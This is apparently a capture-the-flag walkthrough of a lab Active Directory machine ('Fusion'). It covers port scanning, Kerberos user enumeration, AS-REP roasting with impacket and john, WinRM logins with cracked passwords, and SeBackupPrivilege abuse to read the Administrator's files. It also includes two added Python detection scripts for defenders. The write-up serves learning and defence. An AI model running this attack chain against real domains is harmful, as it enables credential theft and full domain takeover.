Port scanning

Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-20 12:43 CST
Nmap scan report for 10.10.2.72
Host is up (0.26s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49674/tcp open unknown
49690/tcp open unknown
49704/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 27.22 seconds

sudo nmap -sT -sV -sC -O -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49667,49668,49669,49670,49671,49674,49690,49704 10.10.190.17 
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-20 17:26 CST
Nmap scan report for 10.10.190.17
Host is up (0.19s latency).

PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: eBusiness Bootstrap Template
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-20 09:27:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp filtered globalcatLDAP
3269/tcp filtered globalcatLDAPssl
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-09-20T09:30:11+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Fusion-DC.fusion.corp
| Not valid before: 2023-09-19T09:26:39
|_Not valid after: 2024-03-20T09:26:39
| rdp-ntlm-info:
| Target_Name: FUSION
| NetBIOS_Domain_Name: FUSION
| NetBIOS_Computer_Name: FUSION-DC
| DNS_Domain_Name: fusion.corp
| DNS_Computer_Name: Fusion-DC.fusion.corp
| Product_Version: 10.0.17763
|_ System_Time: 2023-09-20T09:29:32+00:00
5985/tcp filtered wsman
9389/tcp filtered adws
49667/tcp filtered unknown
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp filtered unknown
49674/tcp filtered unknown
49690/tcp filtered unknown
49704/tcp filtered unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: FUSION-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-20T09:29:32
|_ start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.01 seconds

Domain names found:

fusion.corp

fusion-dc.fusion.corp

Add them to the hosts file.

Web

Browse to port 80.

Several personal names are found:

jhon mickel

andrew arnold

lellien linda

john powel

But no SMB shares could be found.

Brute-force the directories:

gobuster dir -u fusion.corp -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x rar,zip,sql,txt,jsp,php,html,bak

A backup directory is found containing a spreadsheet.

Save all of the usernames from it into a wordlist.

Getshell

Since port 88 (Kerberos) is open, download kerbrute.

sudo mv kerbrute /usr/bin
kerbrute userenum username --dc 10.10.215.12 -d fusion.corp -v

The enumeration finds a valid user, lparker. Run GetNPUsers against the wordlist:

impacket-GetNPUsers fusion.corp/  -usersfile username -no-pass -dc-ip 10.10.165.159 -request>hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Password obtained: !!abbylvzsvs2k6!

GetNPUsers:

GetNPUsers is a tool from the Impacket toolkit.

It asks the target domain controller for the encrypted reply (the "hash") of user accounts that do not have Kerberos pre-authentication set.

Pre-authentication is a security feature of the Kerberos protocol: before a Kerberos ticket is issued, the client must prove to the domain controller that it knows the account password.

By targeting accounts with pre-authentication disabled, GetNPUsers can obtain these accounts' hashes, which can then be used for further attacks such as offline password cracking.
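As an added defender-side example (not code from the original writeup), two checks against the exposure described above: listing accounts whose userAccountControl has the DONT_REQ_PREAUTH bit set, and flagging Security event 4768 records that show the no-pre-auth plus RC4 combination GetNPUsers produces. The record shapes and all sample data are constructed assumptions.

```python
# Defender-side checks for the AS-REP roasting path used above. Added example,
# not code from the original walkthrough; record shapes are assumptions.
import re

UF_ACCOUNTDISABLE = 0x0002          # userAccountControl: account disabled
UF_DONT_REQUIRE_PREAUTH = 0x400000  # userAccountControl: pre-auth not required

def roastable_accounts(users):
    """Enabled accounts whose userAccountControl has DONT_REQ_PREAUTH set.
    users: [{"sAMAccountName": str, "userAccountControl": int}], an assumed
    shape such as an LDAP or ldapdomaindump export."""
    return sorted(
        u["sAMAccountName"] for u in users
        if u["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH
        and not u["userAccountControl"] & UF_ACCOUNTDISABLE
    )

def _field(name, line):
    m = re.search(rf"{re.escape(name)}: (\S+)", line)
    return m.group(1) if m else ""

def asrep_roast_alerts(event_lines):
    """Flag Security event 4768 (TGT requested) lines that match the GetNPUsers
    pattern: no pre-auth data (Pre-Authentication Type 0) and an RC4 ticket
    (Ticket Encryption Type 0x17), the reply that can be cracked offline."""
    hits = []
    for line in event_lines:
        if _field("Event ID", line) != "4768":
            continue
        if (_field("Pre-Authentication Type", line) == "0"
                and _field("Ticket Encryption Type", line).lower() == "0x17"):
            hits.append(_field("Account Name", line))
    return hits

# Constructed samples (not captured from the room); events flattened to one line.
SAMPLE_USERS = [
    {"sAMAccountName": "lparker", "userAccountControl": 0x410200},  # pre-auth off
    {"sAMAccountName": "jmurphy", "userAccountControl": 0x010200},
    {"sAMAccountName": "svc_old", "userAccountControl": 0x400202},  # off, but disabled
]
SAMPLE_4768 = [
    "Event ID: 4768 Account Name: lparker Ticket Encryption Type: 0x17 "
    "Pre-Authentication Type: 0",
    "Event ID: 4768 Account Name: jmurphy Ticket Encryption Type: 0x12 "
    "Pre-Authentication Type: 2",
]

if __name__ == "__main__":
    print("pre-auth off:", roastable_accounts(SAMPLE_USERS))  # ['lparker']
    print("4768 alerts:", asrep_roast_alerts(SAMPLE_4768))     # ['lparker']
```

Disabled accounts are skipped because they cannot obtain a TGT; the fix for the enabled ones is to clear the "Do not require Kerberos preauthentication" flag and enforce AES-only encryption types.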

Since port 5985 (WinRM) is open, try evil-winrm:

evil-winrm -i fusion.corp -u lparker -p '!!abbylvzsvs2k6!'

User1

THM{c105b6fb249741b89432fada8218f4ef}

Lateral movement

net user

There is also a user named jmurphy.

ldapdomaindump  fusion.corp -u 'fusion.corp\lparker' -p '!!abbylvzsvs2k6!'

Look through the dumped domain user information.

jmurphy's password can be found in domain_users.html: u8WC3!kLsgw=#bRY

He is also a member of Backup Operators and has remote desktop rights.

evil-winrm -i fusion.corp -u jmurphy -p 'u8WC3!kLsgw=#bRY'

User2

THM{b4aee2db2901514e28db4242e047612e}

Privilege escalation

whoami /all

jmurphy holds SeBackupPrivilege, which can be leveraged with this project:

https://github.com/giuliano108/SeBackupPrivilege

In the evil-winrm session:

upload SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll
upload SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll
Import-Module C:\Users\jmurphy\SeBackupPrivilegeUtils.dll
Import-Module C:\Users\jmurphy\SeBackupPrivilegeCmdLets.dll
Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\flag.txt C:\Users\jmurphy\Documents\flag.txt
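An added example (not part of the original walkthrough) that triages the PRIVILEGES INFORMATION table from whoami /all and reports ACL-bypassing privileges whether or not they are currently enabled, which is the check that would have caught this account before it was used; SAMPLE_WHOAMI is a constructed excerpt in the real table layout.

```python
# Triage of `whoami /all` privilege output. Added defender-side example, not
# code from the original walkthrough; SAMPLE_WHOAMI is a constructed excerpt.
import re

# Privileges that bypass NTFS ACLs outright. The State column is ignored on
# purpose: "Disabled" only means not enabled in the current token; any holder
# can enable it, which is exactly what the SeBackupPrivilege cmdlets above do.
ACL_BYPASS = {
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
}

ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")

def parse_privileges(whoami_output):
    """Return {privilege_name: state} from the PRIVILEGES INFORMATION table."""
    privs = {}
    for line in whoami_output.splitlines():
        m = ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs

def acl_bypass_findings(whoami_output):
    """(privilege, state, impact) for each ACL-bypassing privilege held."""
    privs = parse_privileges(whoami_output)
    return [(p, privs[p], ACL_BYPASS[p]) for p in ACL_BYPASS if p in privs]

SAMPLE_WHOAMI = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
"""

if __name__ == "__main__":
    for priv, state, impact in acl_bypass_findings(SAMPLE_WHOAMI):
        print(f"{priv} ({state}): {impact}")
```

On a domain controller these privileges come with Backup Operators membership, so the mitigation is to keep that group empty of interactive and remote-management users rather than to toggle the privilege state.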

User3

THM{f72988e57bfc1deeebf2115e10464d15}

Closing thoughts

The early steps here are the usual routine: enumerate users with kerbrute, then check whether SPNs or GetNPUsers give anything. Once a set of user credentials is in hand, ldapdomaindump can be run. After that I learned a bit about the backup privilege.